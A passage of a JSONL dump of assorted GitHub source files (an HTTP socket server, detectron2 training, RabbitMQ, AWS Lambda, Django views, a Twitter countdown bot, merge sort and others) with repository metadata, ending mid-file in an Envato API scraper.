+{"seq_id":"37776546002","text":"import socket\nfrom threading import Lock, Thread\n\nfrom request import Request\nfrom response import Response\n\nclass Server:\n BUFFERSIZE = 1024\n def __init__(self, host: str, port: int, debug:bool=False):\n self._host = host\n self._port = port\n self._s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self._debug = debug\n self._print_lock = Lock()\n\n def initialize(self):\n self._s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self._s.bind((self._host, self._port))\n self._s.listen(5) # Don't know what the number does and seems to not matter\n self._debug_print(f\"listening on {self._host}:{self._port}\")\n self._running = False\n\n def run(self):\n self._running = True\n while self._running:\n try:\n conn, addr = self._s.accept()\n self._debug_print(f\"Accepted connection from {str(addr)}\")\n t = Thread(target=self.handle_client, args=(conn, addr))\n t.start()\n except KeyboardInterrupt:\n self._running = False\n\n self._debug_print(\"Closing server\")\n self._s.close()\n\n def handle_client(self, conn: socket.socket, addr):\n data = conn.recv(Server.BUFFERSIZE)\n req = Request()\n if req.parse(data):\n self._debug_print(f\"Incoming {req.get_method().value} request for {req._path} from {str(addr)}\")\n resp = Response()\n resp.compose_response(req)\n to_send = resp.encode()\n conn.send(to_send)\n\n self._debug_print(f\"Closing connection from {str(addr)}\")\n conn.close()\n\n def _debug_print(self, msg):\n if self._debug:\n with self._print_lock:\n print(msg)\n","repo_name":"yutytuty/ImprovedHttpServer","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33213630671","text":"import sqlite3\r\n\r\n\r\nclass Review:\r\n dbpath = \"data/stacked.db\"\r\n\r\n\r\n def __init__(self, pk,review,company,time_stamp,pros,cons,users_pk ):\r\n self.pk = pk\r\n self.review = review\r\n self.company = company\r\n self.time_stamp = time_stamp\r\n self.pros = pros\r\n self.cons = cons\r\n self.users_pk=users_pk\r\n \r\n\r\n\r\n\r\n def _insert(self):\r\n with sqlite3.connect(self.dbpath) as conn:\r\n cursor = conn.cursor()\r\n SQL = \"\"\"INSERT INTO reviews(\r\n review,company,time_stamp,pros,cons,users_pk) \r\n VALUES (?,?,?,?,?,?);\"\"\"\r\n\r\n values = (self.review,self.company,self.time_stamp,self.pros,self.cons,self.users_pk)\r\n cursor.execute(SQL, values)\r\n\r\n\r\n def save(self):\r\n if self.pk:\r\n self._update()\r\n else:\r\n self._insert()\r\n\r\n\r\n\r\n @classmethod\r\n def count_reviews(cls,company):\r\n with sqlite3.connect(cls.dbpath) as conn:\r\n cursor = conn.cursor()\r\n SQL = \"\"\" SELECT COUNT(review) FROM reviews WHERE company=?\"\"\"\r\n cursor.execute(SQL, (company,))\r\n row = cursor.fetchall()\r\n return row\r\n\r\n\r\n @classmethod\r\n def get_reviews(cls,company):\r\n with sqlite3.connect(cls.dbpath) as conn:\r\n cursor = conn.cursor()\r\n SQL = \"\"\" SELECT review,time_Stamp ,pros,cons FROM reviews WHERE company=?\"\"\"\r\n cursor.execute(SQL, (company,))\r\n row = cursor.fetchall()\r\n return row","repo_name":"kbrien11/stackedcash","sub_path":"app/review.py","file_name":"review.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"15356248658","text":"import logging\nfrom abc import abstractmethod\nfrom typing import List, Union, Optional, Tuple\n\nfrom qiskit.aqua.operators.converters.converter_base import ConverterBase\nfrom qiskit.aqua.operators.operator_base import OperatorBase\nfrom qiskit.circuit import ParameterExpression, ParameterVector\n\nlogger = logging.getLogger(__name__)\n\n\nclass CircuitGradient(ConverterBase):\n r\"\"\"Circuit to gradient operator converter.\n\n Converter for changing parameterized circuits into operators\n whose evaluation yields the gradient with respect to the circuit parameters.\n\n This is distinct from DerivativeBase converters which take gradients of composite\n operators and handle things like differentiating combo_fn's and enforcing product rules\n when operator coefficients are parameterized.\n\n CircuitGradient - uses quantum techniques to get derivatives of circuits\n DerivativeBase - uses classical techniques to differentiate operator flow data structures\n \"\"\"\n\n # pylint: disable=arguments-differ\n @abstractmethod\n def convert(self,\n operator: OperatorBase,\n params: Optional[Union[ParameterExpression, ParameterVector,\n List[ParameterExpression],\n Tuple[ParameterExpression, ParameterExpression],\n List[Tuple[ParameterExpression, ParameterExpression]]]]\n = None,\n ) -> OperatorBase:\n r\"\"\"\n Args:\n operator: The operator we are taking the gradient of\n params: The parameters we are taking the gradient wrt: ω\n If a ParameterExpression, ParameterVector or List[ParameterExpression] is given,\n then the 1st order derivative of the operator is calculated.\n If a Tuple[ParameterExpression, ParameterExpression] or\n List[Tuple[ParameterExpression, ParameterExpression]]\n is given, then the 2nd order derivative of the operator is calculated.\n\n Returns:\n An operator whose evaluation yields the Gradient.\n\n Raises:\n ValueError: If ``params`` contains a parameter not present in ``operator``.\n \"\"\"\n raise NotImplementedError\n","repo_name":"qiskit-community/qiskit-aqua","sub_path":"qiskit/aqua/operators/gradients/circuit_gradients/circuit_gradient.py","file_name":"circuit_gradient.py","file_ext":"py","file_size_in_byte":2299,"program_lang":"python","lang":"en","doc_type":"code","stars":564,"dataset":"github-code","pt":"66"} +{"seq_id":"29597493332","text":"'''\n2020/10/29\n모델 새로 학습 시킬 때 output folder 지우고 val_result 안에 있는 사진 파일 지우거나 백업\nvideorighter\n'''\n\nfrom detectron2.structures import BoxMode\nfrom detectron2.utils.logger import setup_logger\n\nsetup_logger()\nimport numpy as np\nimport os, json, cv2, random\nimport matplotlib.pyplot as plt\n\nfrom detectron2 import model_zoo\nfrom detectron2.engine import DefaultPredictor, DefaultTrainer\nfrom detectron2.config import get_cfg\nfrom detectron2.utils.visualizer import Visualizer, ColorMode\nfrom detectron2.data import MetadataCatalog, DatasetCatalog\nfrom PIL import ImageFile\nimport time\n\nImageFile.LOAD_TRUNCATED_IMAGES = True\n\n\ndef get_facelip_dtcs(json_dir):\n json_file = json_dir\n with open(json_file) as f:\n imgs_anns = json.load(f)\n dataset_dicts = []\n for z in range(len(imgs_anns['images'])):\n record = {}\n record['file_name'] = imgs_anns['images'][z]['file_name']\n record['image_id'] = imgs_anns['images'][z]['id']\n record['width'] = imgs_anns['images'][z]['width']\n record['height'] = imgs_anns['images'][z]['height']\n anno_list = []\n for i in range(len(imgs_anns['annotations'])):\n anno = {}\n if imgs_anns['images'][z]['id'] == imgs_anns['annotations'][i]['image_id']:\n anno['bbox'] = imgs_anns['annotations'][i]['bbox'].copy() # check\n anno['bbox_mode'] = BoxMode.XYWH_ABS\n anno['segmentation'] = []\n anno['category_id'] = imgs_anns['annotations'][i]['category_id']-1 # check\n anno_list.append(anno)\n record['annotations'] = anno_list\n dataset_dicts.append(record)\n return dataset_dicts\ndataset_dicts_train = get_facelip_dtcs(\"/home/videorighter/detectron/FACELIP_DATA_train/annotations/output_train.json\")\nprint(len(dataset_dicts_train))\n\nstart = time.time()\n############################### get resister, metadata #################################\nfor d in [\"train\", \"val\"]:\n DatasetCatalog.register(\"facelip_\" + d, lambda d=d: get_facelip_dtcs(\n \"/home/videorighter/detectron/FACELIP_DATA_\" + d + \"/annotations/output_\" + d + \".json\"))\n MetadataCatalog.get(\"facelip_\" + d).set(thing_classes=[\"lip\", \"face\", \"product\"])\ntrain_facelip_metadata = MetadataCatalog.get(\"facelip_train\")\nval_facelip_metadata = MetadataCatalog.get(\"facelip_val\")\n\n\n################################# training model #######################################\ncfg = get_cfg()\ncfg.merge_from_file(\n \"/home/videorighter/detectron/detectron2/configs/COCO-Detection/faster_rcnn_X_101_32x8d_FPN_3x.yaml\")\ncfg.DATASETS.TRAIN = (\"facelip_train\",)\ncfg.DATASETS.TEST = () # no metrics implemented for this dataset\ncfg.DATALOADER.NUM_WORKERS = 2\ncfg.MODEL.MASK_ON = False\n# cfg.MODEL.BACKBONE.FREEZE_AT = 0\ncfg.MODEL.WEIGHTS = \"/home/videorighter/detectron/detectron2/configs/COCO-Detection/model_final_68b088.pkl\" # initialize from model zoo\ncfg.SOLVER.IMS_PER_BATCH = 1\ncfg.SOLVER.BASE_LR = 0.0001\ncfg.SOLVER.MAX_ITER = 4000 # 300 iterations seems good enough, but you can certainly train longer\ncfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = 128 # faster, and good enough for this toy dataset\ncfg.MODEL.ROI_HEADS.NUM_CLASSES = 3 # 2 classes (lip, face, product)\n\nos.makedirs(cfg.OUTPUT_DIR, exist_ok=True)\ntrainer = DefaultTrainer(cfg)\n\n# 이전에 학습시킨 pth파일로 resume할 것인지 여부\ntrainer.resume_or_load(resume=True)\ntrainer.train()\n\n\n################################# model test ####################################\ncfg.DATASETS.TEST = (\"facelip_val\",) # no metrics implemented for this dataset\ncfg.MODEL.WEIGHTS = os.path.join(cfg.OUTPUT_DIR, \"model_final.pth\")\ncfg.MODEL.RETINANET.SCORE_THRESH_TEST = 0.2 # set the testing threshold for this model\npredictor = DefaultPredictor(cfg)\n\n\n############################# validation print ##################################\ndataset_dicts_val = get_facelip_dtcs(\"/home/videorighter/detectron/FACELIP_DATA_val/annotations/output_val.json\")\nfor d in dataset_dicts_val:\n im = cv2.imread(d[\"file_name\"])\n outputs = predictor(im)\n v = Visualizer(im[:, :, ::-1],\n metadata=val_facelip_metadata,\n scale=1)\n v = v.draw_instance_predictions(outputs[\"instances\"].to(\"cpu\"))\n img = v.get_image()[:, :, ::-1]\n cv2.imwrite(os.path.join(\"/home/videorighter/detectron/val_result\", os.path.split(d[\"file_name\"])[1]), img)\n\n############################# validation score ###################################\nfrom detectron2.evaluation import COCOEvaluator, inference_on_dataset\nfrom detectron2.data import build_detection_test_loader\n\nevaluator = COCOEvaluator(\"facelip_val\", cfg, False, output_dir=\"./output_val/\")\nval_loader = build_detection_test_loader(cfg, \"facelip_val\")\nprint(inference_on_dataset(trainer.model, val_loader, evaluator))\nprint(\"running time: \", time.time() - start)","repo_name":"videorighter/object_detection","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"32501108849","text":"#12.lista\ndef productoEscalar(a,b):\n producto=0\n for i in range(len(a)):\n producto +=a[i]*b[i]\n return producto\n \n \n \n \nd=[3,2,8,7,8,1,9,10]\ne=[3,2,8,7,8,1,9,10]\nprint(productoEscalar(d,e))","repo_name":"anaicm/Principio_Programacion_Python","sub_path":"practica 8/12.listas.2.py","file_name":"12.listas.2.py","file_ext":"py","file_size_in_byte":223,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71136930772","text":"import pika\nimport json\n\n# Connect to RabbitMQ\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\n\n\n# Function will be applied then message received\ndef callback(ch, method, properties, body):\n if properties.content_type == 'application/json':\n d = json.loads(body.decode())\n print(\" [x] Received %r\" % d)\n else:\n print(\" [x] Received %r\" % body.decode())\n\n\nchannel.queue_declare(queue='hello') # declare queue just in case it does not exists\n\nchannel.basic_consume(queue='hello', # name of queue\n auto_ack=True, # if python crashes => do not send message back to queue\n # delete message from queue immediately (without waiting for response from consumer)\n on_message_callback=callback) # function to be applied\n\nprint(' [*] Waiting for messages. To exit press CTRL+C')\nchannel.start_consuming()\n","repo_name":"DmitriiDenisov/rabbitmq_lab","sub_path":"tutorial_1/receive.py","file_name":"receive.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"39080353890","text":"\"\"\"\nExample taken from here:\nhttps://realpython.com/async-io-python/\n\na corouting makerandom() keeps producing random int\nin the range (0, 10). Until one of them exceeds a threshold,\nlet multiple calls of this corouting not need to wait\nfor each other to complete in succession.\n\"\"\"\n\nimport asyncio\nimport random\n\n# ANSI colors\nc = (\n \"\\033[0m\", # End of color\n \"\\033[36m\", # Cyan\n \"\\033[91m\", # Red\n \"\\033[35m\", # Magenta\n)\n\nasync def randint(a: int, b: int) -> int:\n return random.randint(a, b)\n\nasync def makerandom(idx: int, threshold: int = 6) -> int:\n print(c[idx + 1] + f\"Initiated makerandom({idx}).\")\n i = await randint(0, 10)\n while i <= threshold:\n print(c[idx + 1] + f\"makerandom({idx}) == {i} too low; retrying.\")\n await asyncio.sleep(idx + 1)\n i = await randint(0, 10)\n \n print(c[idx + 1] + f\"---> Finished: makerandom({idx}) == {i}\" + c[0])\n return i\n\nasync def main():\n # gather tasks\n res = await asyncio.gather(\n *(makerandom(i, 10 - i -1) for i in range(3))\n )\n return res\n\nif __name__ == \"__main__\":\n random.seed(444)\n r1, r2, r3 = asyncio.run(main())\n print()\n print(f\"r1: {r1}, r2: {r2}, r3: {r3}\")","repo_name":"adikabintang/learn-python","sub_path":"22_asyncio/2_rand.py","file_name":"2_rand.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"342481725","text":"# awswrangler used toaccess files stored in s3 directly\r\nimport awswrangler as wr\r\nimport pandas as pd\r\nimport urllib.parse\r\nimport os\r\n\r\n# Temporary hard-coded AWS Settings; i.e. to be set as OS variable in Lambda\r\n\r\n# Some values that shouldn't be stored in the code are stored on the pc in external file \r\n# and accessed using os.environ[] method\r\n# \r\nos_input_s3_cleansed_layer = os.environ['s3_cleansed_layer']\r\nos_input_glue_catalog_db_name = os.environ['glue_catalog_db_name']\r\nos_input_glue_catalog_table_name = os.environ['glue_catalog_table_name']\r\nos_input_write_data_operation = os.environ['write_data_operation'] # where we want to append data\r\n\r\n\r\ndef lambda_handler(event, context):\r\n # Get the object from the event and show its content type\r\n\r\n # Reading the file from the s3\r\n # It will use the environ variable to get our bucket name\r\n\r\n bucket = event['Records'][0]['s3']['bucket']['name']\r\n # Will use key provided inside the variable\r\n key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')\r\n try:\r\n\r\n # Creating DF from content\r\n df_raw = wr.s3.read_json('s3://{}/{}'.format(bucket, key))\r\n\r\n # Extract required columns:\r\n df_step_1 = pd.json_normalize(df_raw['items'])\r\n\r\n # Write to S3\r\n wr_response = wr.s3.to_parquet(\r\n df=df_step_1,\r\n path=os_input_s3_cleansed_layer,\r\n dataset=True,\r\n database=os_input_glue_catalog_db_name,\r\n table=os_input_glue_catalog_table_name,\r\n mode=os_input_write_data_operation\r\n )\r\n\r\n return wr_response\r\n except Exception as e:\r\n print(e)\r\n print('Error getting object {} from bucket {}. Make sure they exist and your bucket is in the same region as this function.'.format(key, bucket))\r\n raise e","repo_name":"VaiibhavThatai/YouTube-Data-Pipeline-Using-AWS","sub_path":"lambda_function_yt.py","file_name":"lambda_function_yt.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"72920985489","text":"from unityagents import UnityEnvironment\nimport numpy as np\n\nenv = UnityEnvironment(file_name='Reacher.exe')\n\n# get the default brain\nbrain_name = env.brain_names[0]\nbrain = env.brains[brain_name]\n\n# reset the environment\nenv_info = env.reset(train_mode=True)[brain_name]\n\n# number of agents\nnum_agents = len(env_info.agents)\nprint('Number of agents:', num_agents)\n\n# size of each action\naction_size = brain.vector_action_space_size\nprint('Size of each action:', action_size)\n\n# examine the state space\nstates = env_info.vector_observations\nstate_size = states.shape[1]\nprint('There are {} agents. Each observes a state with length: {}'.format(num_agents, state_size))\nprint('The state for the first agent looks like:', states[0])\n\nenv_info = env.reset(train_mode=False)[brain_name] # reset the environment\n# states = env_info.vector_observations # get the current state (for each agent)\n# scores = np.zeros(num_agents) # initialize the score (for each agent)\n# while True:\n# actions = np.random.randn(num_agents, action_size) # select an action (for each agent)\n# actions = np.clip(actions, -1, 1) # all actions between -1 and 1\n# env_info = env.step(actions)[brain_name] # send all actions to tne environment\n# next_states = env_info.vector_observations # get next state (for each agent)\n# rewards = env_info.rewards # get reward (for each agent)\n# dones = env_info.local_done # see if episode finished\n# scores += env_info.rewards # update the score (for each agent)\n# states = next_states # roll over states to next time step\n# if np.any(dones): # exit loop if episode finished\n# break\n# print('Total score (averaged over agents) this episode: {}'.format(np.mean(scores)))\n\nimport gym\nimport random\nimport torch\nimport numpy as np\nfrom collections import deque\nimport matplotlib.pyplot as plt\n#%matplotlib inline\n\nfrom ddpg_agent import Agent\n\n# create single DDPG Agent\nagent = Agent(state_size=state_size, action_size=action_size, random_seed=10)\n\ndef ddpg(n_episodes=200, max_t=1000):\n scores_deque = deque(maxlen=100)\n scores = []\n max_score = -np.Inf\n for i_episode in range(1, n_episodes+1):\n\n # reset the environment\n env_info = env.reset(train_mode=True)[brain_name]\n states = env_info.vector_observations # NOTE: size =\n\n agent.reset()\n score = 0\n for t in range(max_t):\n actions = agent.act(states)\n\n env_info = env.step(actions)[brain_name] # send all actions to tne environment\n next_states = env_info.vector_observations # get next state (for each agent)\n rewards = env_info.rewards # get reward (for each agent)\n dones = env_info.local_done # see if episode finished\n\n agent.step(states, actions, rewards, next_states, dones)\n states = next_states\n score += np.mean(rewards)\n if any(dones):\n break\n\n scores_deque.append(score)\n scores.append(score)\n print('\\rEpisode {}\\tAverage Score: {:.2f}\\tScore: {:.2f}'.format(i_episode, np.mean(scores_deque), score), end=\"\")\n if i_episode % 100 == 0:\n torch.save(agent.actor_local.state_dict(), 'checkpoint_actor.pth')\n torch.save(agent.critic_local.state_dict(), 'checkpoint_critic.pth')\n print('\\rEpisode {}\\tAverage Score: {:.2f}'.format(i_episode, np.mean(scores_deque)))\n return scores\n\nscores = ddpg()\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nplt.plot(np.arange(1, len(scores)+1), scores)\nplt.ylabel('Score')\nplt.xlabel('Episode #')\nplt.show()","repo_name":"puggybumper/drlnd_p2_reacher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9490297540","text":"k = \"keyence\"\nS = input()\nnum = len(k)\nrem = len(S) - num\n\nflag = False\nif S == k:\n flag = True\n\nfor i in range(len(S)-rem):\n if S[0:i] + S[i+rem:] == k:\n flag = True\nif flag:\n print(\"YES\")\nelse:\n print(\"NO\")\n","repo_name":"lilium513/competition_programing","sub_path":"keyence/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"73828661969","text":"from django.shortcuts import render, get_object_or_404, redirect, reverse\nfrom .models import Feature, FeatureComment\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import FeatureForm, FeatureCommentForm\n\n# Create your views here.\n@login_required()\ndef all_features(request):\n all_features = Feature.objects.all()\n return render(request, \"features.html\", {'all_features':all_features} )\n\n@login_required()\ndef upvote_feature(request, id):\n \"\"\"\n A view that upvotes the selected bug\n \"\"\"\n feature = Feature.objects.get(pk=id)\n feature.upvotes += 1\n feature.save()\n return redirect(all_features)\n\n@login_required()\ndef add_feature(request):\n if request.method == \"POST\":\n submitted_form = FeatureForm(request.POST, request.FILES)\n if submitted_form.is_valid():\n submitted_form.save()\n return redirect(all_features)\n else:\n return(request,\"add_feature.html\",{\n 'form':submitted_form\n })\n else:\n toadd_form = FeatureForm()\n return render(request,\"add_feature.html\",{\n 'form' : toadd_form\n })\n\n@login_required()\ndef edit_feature(request, id):\n edit_item = get_object_or_404(Feature, pk=id)\n if request.method == \"POST\":\n submitted_form = FeatureForm(request.POST, instance=edit_item)\n if submitted_form.is_valid():\n submitted_form.save()\n return redirect(all_features)\n else:\n form = FeatureForm(instance=edit_item)\n return render(request, 'edit_feature.html',{\n 'item_form':form\n })\n\n@login_required()\ndef delete_feature(request, id):\n delete_item = get_object_or_404(Feature, pk=id)\n if request.method == \"POST\":\n delete_item.delete()\n return redirect(all_features)\n else:\n return render(request, 'confirm-delete.html',{\n 't':delete_item\n })\n\n","repo_name":"Code-Institute-Submissions/fullstack-project","sub_path":"features/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35677369393","text":"import pytz\nfrom datetime import datetime\nimport time\nimport random\n\ndef variable_ratio_daily_countdown_tweet(api,delay_after_tweeting=0,tweet_inverse_odds=15):\n \"\"\"tweets out a daily countdown to the wellington spatial plan submission\n does so probabilistically, i.e., when run n times a day, each time it is run there is a 1/n chance it will tweet\n so as to spread the tweets right across the period.\n \"\"\"\n\n #get new zealand timezone\n nztz = pytz.timezone(\"Pacific/Auckland\")\n #get now and today\n now = datetime.now(nztz)\n today = datetime.date(now)\n\n spatial_plan_deadline = datetime.strptime(\"2020-10-05 17:00\",\"%Y-%m-%d %H:%M\")\n days_left_to_submit = (spatial_plan_deadline.date() - today).days\n\n\n # for tweets going out between 8 AM and up to 11 PM\n permitted_start_time = datetime.combine(today,datetime.strptime(\"07:59\", \"%H:%M\").time()).astimezone(nztz)\n permitted_end_time = datetime.combine(today, datetime.strptime(\"22:50\", \"%H:%M\").time()).astimezone(nztz)\n\n #determine if now is within the permitted range\n is_within_time_range = (now>permitted_start_time) & (now < permitted_end_time)\n\n #this is about 15 hours of the day so that's what we'll use\n chance_of_tweeting = 1/tweet_inverse_odds\n random.seed(datetime.now())\n lucky_hour_dip = random.random()\n print(\"lucky hour dip number is \" + str(lucky_hour_dip))\n is_lucky_hour = (lucky_hour_dip 0:\n print(\"tweeting a reminder about wellington spatial plan\")\n tweet_version = random.sample([0,1,2,3],1)[0]\n if tweet_version==0:\n tweet_text = (str(days_left_to_submit) +\n \" days left to submit for the Wellington Spatial Plan. \" +\n \"All it takes is 10 minutes for you to influence the future of Wellington.\" +\n \" Submit here: https://planningforgrowth.wellington.govt.nz/spatial-plan\"\n )\n elif tweet_version==1:\n tweet_text = (\n \"There are \" + str(days_left_to_submit) + \" days to get in a submission for the Wellington Spatial Plan. \" +\n \"It sets the limits for how much housing can be built in Wellington for the next THIRTY YEARS! \" +\n \"Here's the link to submit. https://planningforgrowth.wellington.govt.nz/spatial-plan\"\n )\n elif tweet_version==2:\n tweet_text = (\n str(days_left_to_submit) + \" sleeps left until the submission deadline for the Wellington Spatial Plan closes. \" +\n \"It takes 10 minutes of your time - if you haven't already, get your submission in now. \" +\n \"https://planningforgrowth.wellington.govt.nz/spatial-plan\"\n )\n elif tweet_version==3:\n tweet_text = (\n str(days_left_to_submit) + \" days left to have a say on the Wellington Spatial Plan. \" +\n \"It takes 10 minutes and determines whether Wellington housing is affordable for the next 30 years.\" +\n \" tell the council we need more housing! \" +\n \"https://planningforgrowth.wellington.govt.nz/spatial-plan\"\n )\n\n print(tweet_text)\n\n\n api.update_status(tweet_text)\n\n time.sleep(delay_after_tweeting)\n\n# from authenticate import *\n#\n# api = get_authenticated_api()\n#\n# for i in range(0,10):\n# variable_ratio_daily_countdown_tweet(api,1)\n\n\n\n","repo_name":"bjsmith/housingbot","sub_path":"daily_countdown.py","file_name":"daily_countdown.py","file_ext":"py","file_size_in_byte":3500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30231440176","text":"#!/usr/bin/env python3\n\nimport sys\nimport math\nimport csv\n\ncolmapping={}\ncolindexing={}\nmainmemorysize=0\nchunksize=0\nheap=[]\n\nclass Node:\n\tdef __init__(self):\n\t\t#data will be a list\n\t\tself.data=[]\n\t\tself.fp=-1\n\ndef readfile(filename):\n lines=[]\n f1=open(filename)\n lines=f1.readlines()\n f1.close()\n return lines\n\ndef readmetadata(filename):\n\tlines=readfile(filename)\n\tj=0\n\tfor i in lines:\n\t\ta,b=i.split(\",\")\n\t\tcolmapping[a]=int(b)\n\t\tcolindexing[a]=j\n\t\tj+=1\n\t\t\ndef readwordfromlines(line):\n\twords=[]\n\toffset=0\n\tfor i in colmapping.values():\n\t\twords.append(line[offset:offset+i])\n\t\toffset=offset+i+2\n\treturn words\n\ndef parseinput(cmddata):\n\tinput_file=cmddata[1]\n\toutput_file=cmddata[2]\n\tsize=int(cmddata[3])*1024*1024\n\tnthread=int(cmddata[4])\n\tcode=cmddata[5]\n\tif(code=='dsc'):\n\t\tflag=True\n\telif(code=='asc'):\n\t\tflag=False\n\telse:\n\t\tprint('PLease specify the correct sorting order')\n\t\texit()\n\tcolumns=[]\n\ti=6\n\twhile(i0):\n\t\tfilearray.append('temp'+str(findex)+'.txt')\n\t\tf2=open(filearray[findex],'w')\n\t\ttempresult=sortdata(tempresult,columns,flag)\n\t\twritelistoflist(f2,tempresult)\n\t\tf2.close()\n\t\tfindex+=1\n\tf1.close()\n\treturn filearray\n\ndef compare(l1,l2,columns,flag):\n\tif(flag):\n\t\tfor j in columns:\n\t\t\ti=colindexing[j]\n\t\t\tif(l1[i]>l2[i]):\n\t\t\t\treturn True\n\t\t\telif(l1[i]==l2[i]):\n\t\t\t\tcontinue\n\t\t\telse:\n\t\t\t\treturn False\n\t\treturn False\n\telse:\n\t\tfor j in columns:\n\t\t\ti=colindexing[j]\n\t\t\tif(l1[i]=0):\n\t\tminheapify(i,columns,flag)\n\t\ti-=1\n\ndef adjust(pos,columns,flag):\n\tchild=pos\n\tparent=math.floor((child-1)/2)\n\n\twhile(parent>=0 and compare(heap[child].data,heap[parent].data,columns,flag)):\n\t\ttemp=heap[child]\n\t\theap[child]=heap[parent]\n\t\theap[parent]=temp\n\n\t\tchild=parent\n\t\tparent=math.floor((child-1)/2)\n\ndef removemin(columns,flag):\n\ttemp=heap[0]\n\t\n\theap[0]=heap[len(heap)-1]\n\theap.pop()\n\n\tminheapify(0,columns,flag)\n\treturn temp\n\ndef mergesplittedfiles(filearray,columns,flag):\n\n\tfilepointer=[None]*len(filearray)\n\tfor i in range(len(filearray)):\n\t\tfilepointer[i]=open(filearray[i])\n\t\tdata=readoneline(filepointer[i])\n\t\ttemp=Node()\n\t\ttemp.fp=i\n\t\ttemp.data=data\n\t\theap.append(temp)\n\n\tbuildminheap(columns,flag)\n\n\tfpwrite=open('tempoutput.txt','w')\n\tfileclosecount=0\n\n\twhile(fileclosecount!=len(filearray)):\n\t\ttemp=removemin(columns,flag)\n\t\tresult=[]\n\t\tresult.append(temp.data)\n\t\twritelistoflist(fpwrite,result)\n\n\t\tdata=readoneline(filepointer[temp.fp])\n\t\tif(len(data)!=0):\n\t\t\ttemp.data=data\n\t\t\theap.append(temp)\n\t\t\tadjust(len(heap)-1,columns,flag)\n\t\telse:\n\t\t\tfileclosecount+=1\n\n\tfor i in range(len(filearray)):\n\t\tfilepointer[i]=open(filearray[i])\n\treturn 1\n\ncmddata=sys.argv\nif(len(cmddata)<6):\n\tprint('PLease enter all parameter')\nelse:\n\tinput_file,output_file,mainmemorysize,nthread,flag,columns=parseinput(cmddata)\n\treadmetadata('metadata.txt')\n\tchunksize=calcchunksize()\n\n\tprintstats()\n\t\n\tfilearray=splitdata_sorted(input_file,columns,flag)\n\tmergesplittedfiles(filearray,columns,flag)\n","repo_name":"shanu-sh/TwoPhaseMergeSort","sub_path":"q1.py","file_name":"q1.py","file_ext":"py","file_size_in_byte":4908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30134471056","text":"import unittest\n\nfrom clib.utils import load_class, get_index_from_label\n\n\nclass LoadClassTest(unittest.TestCase):\n def setUp(self):\n self.vocfilepath = 'tests/data/voc.names'\n self.tags = {0: 'hoge', 1: 'fuga'}\n\n def test_load_class(self):\n self.assertEqual(load_class(self.vocfilepath),\n {0: 'aeroplane', 1: 'bicycle', 2: 'bird',\n 3: 'boat', 4: 'bottle', 5: 'bus', 6: 'car',\n 7: 'cat', 8: 'chair', 9: 'cow',\n 10: 'diningtable', 11: 'dog', 12: 'horse',\n 13: 'motorbike', 14: 'person',\n 15: 'pottedplant', 16: 'sheep', 17: 'sofa',\n 18: 'train', 19: 'tvmonitor'})\n\n def test_get_index(self):\n self.assertEqual(get_index_from_label(self.tags, 'fuga'), 1),\n","repo_name":"Swall0w/clib","sub_path":"tests/utils/test_load.py","file_name":"test_load.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6766661709","text":"import functools\n\ndef memoize(func):\n cache = func.cache = {}\n @functools.wraps(func)\n def memoized_func(*args, **kwargs):\n key = str(args) + str(kwargs)\n if key not in cache:\n cache[key] = func(*args, **kwargs)\n return cache[key]\n return memoized_func\n\n@memoize\ndef sudan(n, x, y):\n if n == 0:\n return x + y\n if y == 0:\n return x\n else:\n return sudan(n - 1, sudan(n, x, y - 1), sudan(n, x, y - 1) + y)\n \nprint (sudan(2, 3, 1))\nprint (sudan(2, 4, 1))\nprint (sudan(2, 1, 2))\nprint (sudan(2, 2, 2))","repo_name":"karol95c/University","sub_path":"Python/Lab3/memoize.py","file_name":"memoize.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"3355453882","text":"import json\nimport requests\nimport os\nimport time\n\n#url='http://marketplace.envato.com/api/edge/item:10431404.json'\ntheme = open('theme_id.txt','r')\ntheme_id = theme.readlines()\ntotal_theme = theme_id.__len__()\n\nsave_to_file = open('theme_data_Apr05.txt','r+', buffering = -1)\n\ni=0\nwhile i < total_theme:\n url1 = 'http://marketplace.envato.com/api/edge/item:' + theme_id[i] + '.json'\n i += 1\n# data = requests.get(url1).text\n# data = json.loads(data)\n data = 